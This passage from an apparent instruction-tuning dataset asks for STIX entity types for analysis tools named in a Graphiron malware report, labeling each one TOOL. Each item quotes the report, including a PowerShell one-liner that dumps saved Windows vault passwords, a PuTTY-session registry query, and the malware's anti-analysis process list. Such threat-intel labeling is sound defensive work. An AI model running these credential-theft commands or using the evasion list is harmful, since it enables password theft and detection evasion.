\"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\nfilemon\n\n---\n\n### Text Passage:\nGraphiron functionality\nGraphiron is a two-stage threat consisting of a downloader (Downloader.Graphiron) and a payload (Infostealer.Graphiron).\nThe downloader contains hardcoded command-and-control (C&C) server addresses. When executed, it will check against a blacklist of malware analysis tools by checking for running processes with the names listed in Table 1.\nTable 1: Graphiron checks against a blacklist of malware analysis tools by checking for running processes with specific namesProcess names\n---\nBurpSuite, BurpSuiteFree, CFF Explorer, Charles, DumpIt, Fiddler, HTTPDebuggerSVC, HTTPDebuggerUI, HookExplorer, Immunity, ImportREC, LordPE, MegaDumper, NetworkMiner, PEToolW, Proxifier, RAMMap, RAMMap64, ResourceHacker, SysInspector, WSockExpert, WinDump, Wireshar, agent.py, autoruns, autoruns, dbgview, disassembly, dumpcap, filemon, httpdebugger, httpsMon, ida,idag, idag64, idaq, idaq64, idau, idau64, idaw, idaw64, joeboxcontrol, joeboxserver, mitmdump, mitmweb, ollydbg, pestudio, proc_analyzer, processhacker, procexp, procexp64, procmon, procmon64, protection_id, pslist, reconstructor, regmon, reshacker, rpcapd, scylla, scylla_64, scylla_86, smsniff, sniff_hit, tcpvcon, tcpview, tshark, vmmat, windbg, x32dbg, x64dbg, x96dbg\nIf no blacklisted processes are found, it will connect to a C&C server and download and decrypt the payload before adding it to autorun.\nThe downloader is configured to run just once. If it fails to download and install the payload it won\u2019t make further attempts nor send a heartbeat.\nGraphiron uses AES encryption with hardcoded keys. It creates temporary files with the \".lock\" and \".trash\" extensions. It uses hardcoded file names designed to masquerade as Microsoft office executables: OfficeTemplate.exe and MicrosoftOfficeDashboard.exe\nThe payload is capable of carrying out the following tasks:\n* Reads MachineGuid\n* Obtains the IP address from https://checkip.amazonaws.com\n* Retrieves the hostname, system info, and user info\n* Steals data from Firefox and Thunderbird\n* Steals private keys from MobaXTerm.\n* Steals SSH known hosts\n* Steals data from PuTTY\n* Steals stored passwords\n* Takes screenshots\n* Creates a directory\n* Lists a directory\n* Runs a shell command\n* Steals an arbitrary file\nPassword theft is carried out using the following PowerShell command:\n_[void][Windows.Security.Credentials.PasswordVault,Windows.Security.Credentials,ContentType=WindowsRuntime];$vault = New-Object Windows.Security.Credentials.PasswordVault;$vault.RetrieveAll() % { $_.RetrievePassw_\n_ord();$_} Select UserName, Resource, Password Format-Table \u2013HideTableHeaders_\nThe following command was used to export the list of PuTTY sessions:\n_\"CSIDL_SYSTEM\\reg.exe\" query HKCU\\Software\\SimonTatham\\Putty\\Sessions_\n",
"output": "TOOL"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\nPowerShell\n\n---\n\n### Text Passage:\nGraphiron functionality\nGraphiron is a two-stage threat consisting of a downloader (Downloader.Graphiron) and a payload (Infostealer.Graphiron).\nThe downloader contains hardcoded command-and-control (C&C) server addresses. When executed, it will check against a blacklist of malware analysis tools by checking for running processes with the names listed in Table 1.\nTable 1: Graphiron checks against a blacklist of malware analysis tools by checking for running processes with specific namesProcess names\n---\nBurpSuite, BurpSuiteFree, CFF Explorer, Charles, DumpIt, Fiddler, HTTPDebuggerSVC, HTTPDebuggerUI, HookExplorer, Immunity, ImportREC, LordPE, MegaDumper, NetworkMiner, PEToolW, Proxifier, RAMMap, RAMMap64, ResourceHacker, SysInspector, WSockExpert, WinDump, Wireshar, agent.py, autoruns, autoruns, dbgview, disassembly, dumpcap, filemon, httpdebugger, httpsMon, ida,idag, idag64, idaq, idaq64, idau, idau64, idaw, idaw64, joeboxcontrol, joeboxserver, mitmdump, mitmweb, ollydbg, pestudio, proc_analyzer, processhacker, procexp, procexp64, procmon, procmon64, protection_id, pslist, reconstructor, regmon, reshacker, rpcapd, scylla, scylla_64, scylla_86, smsniff, sniff_hit, tcpvcon, tcpview, tshark, vmmat, windbg, x32dbg, x64dbg, x96dbg\nIf no blacklisted processes are found, it will connect to a C&C server and download and decrypt the payload before adding it to autorun.\nThe downloader is configured to run just once. If it fails to download and install the payload it won\u2019t make further attempts nor send a heartbeat.\nGraphiron uses AES encryption with hardcoded keys. It creates temporary files with the \".lock\" and \".trash\" extensions. It uses hardcoded file names designed to masquerade as Microsoft office executables: OfficeTemplate.exe and MicrosoftOfficeDashboard.exe\nThe payload is capable of carrying out the following tasks:\n* Reads MachineGuid\n* Obtains the IP address from https://checkip.amazonaws.com\n* Retrieves the hostname, system info, and user info\n* Steals data from Firefox and Thunderbird\n* Steals private keys from MobaXTerm.\n* Steals SSH known hosts\n* Steals data from PuTTY\n* Steals stored passwords\n* Takes screenshots\n* Creates a directory\n* Lists a directory\n* Runs a shell command\n* Steals an arbitrary file\nPassword theft is carried out using the following PowerShell command:\n_[void][Windows.Security.Credentials.PasswordVault,Windows.Security.Credentials,ContentType=WindowsRuntime];$vault = New-Object Windows.Security.Credentials.PasswordVault;$vault.RetrieveAll() % { $_.RetrievePassw_\n_ord();$_} Select UserName, Resource, Password Format-Table \u2013HideTableHeaders_\nThe following command was used to export the list of PuTTY sessions:\n_\"CSIDL_SYSTEM\\reg.exe\" query HKCU\\Software\\SimonTatham\\Putty\\Sessions_\n",
"output": "TOOL"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\npestudio\n\n---\n\n### Text Passage:\nGraphiron functionality\nGraphiron is a two-stage threat consisting of a downloader (Downloader.Graphiron) and a payload (Infostealer.Graphiron).\nThe downloader contains hardcoded command-and-control (C&C) server addresses. When executed, it will check against a blacklist of malware analysis tools by checking for running processes with the names listed in Table 1.\nTable 1: Graphiron checks against a blacklist of malware analysis tools by checking for running processes with specific namesProcess names\n---\nBurpSuite, BurpSuiteFree, CFF Explorer, Charles, DumpIt, Fiddler, HTTPDebuggerSVC, HTTPDebuggerUI, HookExplorer, Immunity, ImportREC, LordPE, MegaDumper, NetworkMiner, PEToolW, Proxifier, RAMMap, RAMMap64, ResourceHacker, SysInspector, WSockExpert, WinDump, Wireshar, agent.py, autoruns, autoruns, dbgview, disassembly, dumpcap, filemon, httpdebugger, httpsMon, ida,idag, idag64, idaq, idaq64, idau, idau64, idaw, idaw64, joeboxcontrol, joeboxserver, mitmdump, mitmweb, ollydbg, pestudio, proc_analyzer, processhacker, procexp, procexp64, procmon, procmon64, protection_id, pslist, reconstructor, regmon, reshacker, rpcapd, scylla, scylla_64, scylla_86, smsniff, sniff_hit, tcpvcon, tcpview, tshark, vmmat, windbg, x32dbg, x64dbg, x96dbg\nIf no blacklisted processes are found, it will connect to a C&C server and download and decrypt the payload before adding it to autorun.\nThe downloader is configured to run just once. If it fails to download and install the payload it won\u2019t make further attempts nor send a heartbeat.\nGraphiron uses AES encryption with hardcoded keys. It creates temporary files with the \".lock\" and \".trash\" extensions. It uses hardcoded file names designed to masquerade as Microsoft office executables: OfficeTemplate.exe and MicrosoftOfficeDashboard.exe\nThe payload is capable of carrying out the following tasks:\n* Reads MachineGuid\n* Obtains the IP address from https://checkip.amazonaws.com\n* Retrieves the hostname, system info, and user info\n* Steals data from Firefox and Thunderbird\n* Steals private keys from MobaXTerm.\n* Steals SSH known hosts\n* Steals data from PuTTY\n* Steals stored passwords\n* Takes screenshots\n* Creates a directory\n* Lists a directory\n* Runs a shell command\n* Steals an arbitrary file\nPassword theft is carried out using the following PowerShell command:\n_[void][Windows.Security.Credentials.PasswordVault,Windows.Security.Credentials,ContentType=WindowsRuntime];$vault = New-Object Windows.Security.Credentials.PasswordVault;$vault.RetrieveAll() % { $_.RetrievePassw_\n_ord();$_} Select UserName, Resource, Password Format-Table \u2013HideTableHeaders_\nThe following command was used to export the list of PuTTY sessions:\n_\"CSIDL_SYSTEM\\reg.exe\" query HKCU\\Software\\SimonTatham\\Putty\\Sessions_\n",
"output": "TOOL"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\nprocmon\n\n---\n\n### Text Passage:\nGraphiron functionality\nGraphiron is a two-stage threat consisting of a downloader (Downloader.Graphiron) and a payload (Infostealer.Graphiron).\nThe downloader contains hardcoded command-and-control (C&C) server addresses. When executed, it will check against a blacklist of malware analysis tools by checking for running processes with the names listed in Table 1.\nTable 1: Graphiron checks against a blacklist of malware analysis tools by checking for running processes with specific namesProcess names\n---\nBurpSuite, BurpSuiteFree, CFF Explorer, Charles, DumpIt, Fiddler, HTTPDebuggerSVC, HTTPDebuggerUI, HookExplorer, Immunity, ImportREC, LordPE, MegaDumper, NetworkMiner, PEToolW, Proxifier, RAMMap, RAMMap64, ResourceHacker, SysInspector, WSockExpert, WinDump, Wireshar, agent.py, autoruns, autoruns, dbgview, disassembly, dumpcap, filemon, httpdebugger, httpsMon, ida,idag, idag64, idaq, idaq64, idau, idau64, idaw, idaw64, joeboxcontrol, joeboxserver, mitmdump, mitmweb, ollydbg, pestudio, proc_analyzer, processhacker, procexp, procexp64, procmon, procmon64, protection_id, pslist, reconstructor, regmon, reshacker, rpcapd, scylla, scylla_64, scylla_86, smsniff, sniff_hit, tcpvcon, tcpview, tshark, vmmat, windbg, x32dbg, x64dbg, x96dbg\nIf no blacklisted processes are found, it will connect to a C&C server and download and decrypt the payload before adding it to autorun.\nThe downloader is configured to run just once. If it fails to download and install the payload it won\u2019t make further attempts nor send a heartbeat.\nGraphiron uses AES encryption with hardcoded keys. It creates temporary files with the \".lock\" and \".trash\" extensions. It uses hardcoded file names designed to masquerade as Microsoft office executables: OfficeTemplate.exe and MicrosoftOfficeDashboard.exe\nThe payload is capable of carrying out the following tasks:\n* Reads MachineGuid\n* Obtains the IP address from https://checkip.amazonaws.com\n* Retrieves the hostname, system info, and user info\n* Steals data from Firefox and Thunderbird\n* Steals private keys from MobaXTerm.\n* Steals SSH known hosts\n* Steals data from PuTTY\n* Steals stored passwords\n* Takes screenshots\n* Creates a directory\n* Lists a directory\n* Runs a shell command\n* Steals an arbitrary file\nPassword theft is carried out using the following PowerShell command:\n_[void][Windows.Security.Credentials.PasswordVault,Windows.Security.Credentials,ContentType=WindowsRuntime];$vault = New-Object Windows.Security.Credentials.PasswordVault;$vault.RetrieveAll() % { $_.RetrievePassw_\n_ord();$_} Select UserName, Resource, Password Format-Table \u2013HideTableHeaders_\nThe following command was used to export the list of PuTTY sessions:\n_\"CSIDL_SYSTEM\\reg.exe\" query HKCU\\Software\\SimonTatham\\Putty\\Sessions_\n",
"output": "TOOL"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\ntcpview\n\n---\n\n### Text Passage:\nGraphiron functionality\nGraphiron is a two-stage threat consisting of a downloader (Downloader.Graphiron) and a payload (Infostealer.Graphiron).\nThe downloader contains hardcoded command-and-control (C&C) server addresses. When executed, it will check against a blacklist of malware analysis tools by checking for running processes with the names listed in Table 1.\nTable 1: Graphiron checks against a blacklist of malware analysis tools by checking for running processes with specific namesProcess names\n---\nBurpSuite, BurpSuiteFree, CFF Explorer, Charles, DumpIt, Fiddler, HTTPDebuggerSVC, HTTPDebuggerUI, HookExplorer, Immunity, ImportREC, LordPE, MegaDumper, NetworkMiner, PEToolW, Proxifier, RAMMap, RAMMap64, ResourceHacker, SysInspector, WSockExpert, WinDump, Wireshar, agent.py, autoruns, autoruns, dbgview, disassembly, dumpcap, filemon, httpdebugger, httpsMon, ida,idag, idag64, idaq, idaq64, idau, idau64, idaw, idaw64, joeboxcontrol, joeboxserver, mitmdump, mitmweb, ollydbg, pestudio, proc_analyzer, processhacker, procexp, procexp64, procmon, procmon64, protection_id, pslist, reconstructor, regmon, reshacker, rpcapd, scylla, scylla_64, scylla_86, smsniff, sniff_hit, tcpvcon, tcpview, tshark, vmmat, windbg, x32dbg, x64dbg, x96dbg\nIf no blacklisted processes are found, it will connect to a C&C server and download and decrypt the payload before adding it to autorun.\nThe downloader is configured to run just once. If it fails to download and install the payload it won\u2019t make further attempts nor send a heartbeat.\nGraphiron uses AES encryption with hardcoded keys. It creates temporary files with the \".lock\" and \".trash\" extensions. It uses hardcoded file names designed to masquerade as Microsoft office executables: OfficeTemplate.exe and MicrosoftOfficeDashboard.exe\nThe payload is capable of carrying out the following tasks:\n* Reads MachineGuid\n* Obtains the IP address from https://checkip.amazonaws.com\n* Retrieves the hostname, system info, and user info\n* Steals data from Firefox and Thunderbird\n* Steals private keys from MobaXTerm.\n* Steals SSH known hosts\n* Steals data from PuTTY\n* Steals stored passwords\n* Takes screenshots\n* Creates a directory\n* Lists a directory\n* Runs a shell command\n* Steals an arbitrary file\nPassword theft is carried out using the following PowerShell command:\n_[void][Windows.Security.Credentials.PasswordVault,Windows.Security.Credentials,ContentType=WindowsRuntime];$vault = New-Object Windows.Security.Credentials.PasswordVault;$vault.RetrieveAll() % { $_.RetrievePassw_\n_ord();$_} Select UserName, Resource, Password Format-Table \u2013HideTableHeaders_\nThe following command was used to export the list of PuTTY sessions:\n_\"CSIDL_SYSTEM\\reg.exe\" query HKCU\\Software\\SimonTatham\\Putty\\Sessions_\n",
"output": "TOOL"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\ndumpcap\n\n---\n\n### Text Passage:\nGraphiron functionality\nGraphiron is a two-stage threat consisting of a downloader (Downloader.Graphiron) and a payload (Infostealer.Graphiron).\nThe downloader contains hardcoded command-and-control (C&C) server addresses. When executed, it will check against a blacklist of malware analysis tools by checking for running processes with the names listed in Table 1.\nTable 1: Graphiron checks against a blacklist of malware analysis tools by checking for running processes with specific namesProcess names\n---\nBurpSuite, BurpSuiteFree, CFF Explorer, Charles, DumpIt, Fiddler, HTTPDebuggerSVC, HTTPDebuggerUI, HookExplorer, Immunity, ImportREC, LordPE, MegaDumper, NetworkMiner, PEToolW, Proxifier, RAMMap, RAMMap64, ResourceHacker, SysInspector, WSockExpert, WinDump, Wireshar, agent.py, autoruns, autoruns, dbgview, disassembly, dumpcap, filemon, httpdebugger, httpsMon, ida,idag, idag64, idaq, idaq64, idau, idau64, idaw, idaw64, joeboxcontrol, joeboxserver, mitmdump, mitmweb, ollydbg, pestudio, proc_analyzer, processhacker, procexp, procexp64, procmon, procmon64, protection_id, pslist, reconstructor, regmon, reshacker, rpcapd, scylla, scylla_64, scylla_86, smsniff, sniff_hit, tcpvcon, tcpview, tshark, vmmat, windbg, x32dbg, x64dbg, x96dbg\nIf no blacklisted processes are found, it will connect to a C&C server and download and decrypt the payload before adding it to autorun.\nThe downloader is configured to run just once. If it fails to download and install the payload it won\u2019t make further attempts nor send a heartbeat.\nGraphiron uses AES encryption with hardcoded keys. It creates temporary files with the \".lock\" and \".trash\" extensions. It uses hardcoded file names designed to masquerade as Microsoft office executables: OfficeTemplate.exe and MicrosoftOfficeDashboard.exe\nThe payload is capable of carrying out the following tasks:\n* Reads MachineGuid\n* Obtains the IP address from https://checkip.amazonaws.com\n* Retrieves the hostname, system info, and user info\n* Steals data from Firefox and Thunderbird\n* Steals private keys from MobaXTerm.\n* Steals SSH known hosts\n* Steals data from PuTTY\n* Steals stored passwords\n* Takes screenshots\n* Creates a directory\n* Lists a directory\n* Runs a shell command\n* Steals an arbitrary file\nPassword theft is carried out using the following PowerShell command:\n_[void][Windows.Security.Credentials.PasswordVault,Windows.Security.Credentials,ContentType=WindowsRuntime];$vault = New-Object Windows.Security.Credentials.PasswordVault;$vault.RetrieveAll() % { $_.RetrievePassw_\n_ord();$_} Select UserName, Resource, Password Format-Table \u2013HideTableHeaders_\nThe following command was used to export the list of PuTTY sessions:\n_\"CSIDL_SYSTEM\\reg.exe\" query HKCU\\Software\\SimonTatham\\Putty\\Sessions_\n",
"output": "TOOL"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\nLordPE\n\n---\n\n### Text Passage:\nGraphiron functionality\nGraphiron is a two-stage threat consisting of a downloader (Downloader.Graphiron) and a payload (Infostealer.Graphiron).\nThe downloader contains hardcoded command-and-control (C&C) server addresses. When executed, it will check against a blacklist of malware analysis tools by checking for running processes with the names listed in Table 1.\nTable 1: Graphiron checks against a blacklist of malware analysis tools by checking for running processes with specific namesProcess names\n---\nBurpSuite, BurpSuiteFree, CFF Explorer, Charles, DumpIt, Fiddler, HTTPDebuggerSVC, HTTPDebuggerUI, HookExplorer, Immunity, ImportREC, LordPE, MegaDumper, NetworkMiner, PEToolW, Proxifier, RAMMap, RAMMap64, ResourceHacker, SysInspector, WSockExpert, WinDump, Wireshar, agent.py, autoruns, autoruns, dbgview, disassembly, dumpcap, filemon, httpdebugger, httpsMon, ida,idag, idag64, idaq, idaq64, idau, idau64, idaw, idaw64, joeboxcontrol, joeboxserver, mitmdump, mitmweb, ollydbg, pestudio, proc_analyzer, processhacker, procexp, procexp64, procmon, procmon64, protection_id, pslist, reconstructor, regmon, reshacker, rpcapd, scylla, scylla_64, scylla_86, smsniff, sniff_hit, tcpvcon, tcpview, tshark, vmmat, windbg, x32dbg, x64dbg, x96dbg\nIf no blacklisted processes are found, it will connect to a C&C server and download and decrypt the payload before adding it to autorun.\nThe downloader is configured to run just once. If it fails to download and install the payload it won\u2019t make further attempts nor send a heartbeat.\nGraphiron uses AES encryption with hardcoded keys. It creates temporary files with the \".lock\" and \".trash\" extensions. It uses hardcoded file names designed to masquerade as Microsoft office executables: OfficeTemplate.exe and MicrosoftOfficeDashboard.exe\nThe payload is capable of carrying out the following tasks:\n* Reads MachineGuid\n* Obtains the IP address from https://checkip.amazonaws.com\n* Retrieves the hostname, system info, and user info\n* Steals data from Firefox and Thunderbird\n* Steals private keys from MobaXTerm.\n* Steals SSH known hosts\n* Steals data from PuTTY\n* Steals stored passwords\n* Takes screenshots\n* Creates a directory\n* Lists a directory\n* Runs a shell command\n* Steals an arbitrary file\nPassword theft is carried out using the following PowerShell command:\n_[void][Windows.Security.Credentials.PasswordVault,Windows.Security.Credentials,ContentType=WindowsRuntime];$vault = New-Object Windows.Security.Credentials.PasswordVault;$vault.RetrieveAll() % { $_.RetrievePassw_\n_ord();$_} Select UserName, Resource, Password Format-Table \u2013HideTableHeaders_\nThe following command was used to export the list of PuTTY sessions:\n_\"CSIDL_SYSTEM\\reg.exe\" query HKCU\\Software\\SimonTatham\\Putty\\Sessions_\n",
"output": "TOOL"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
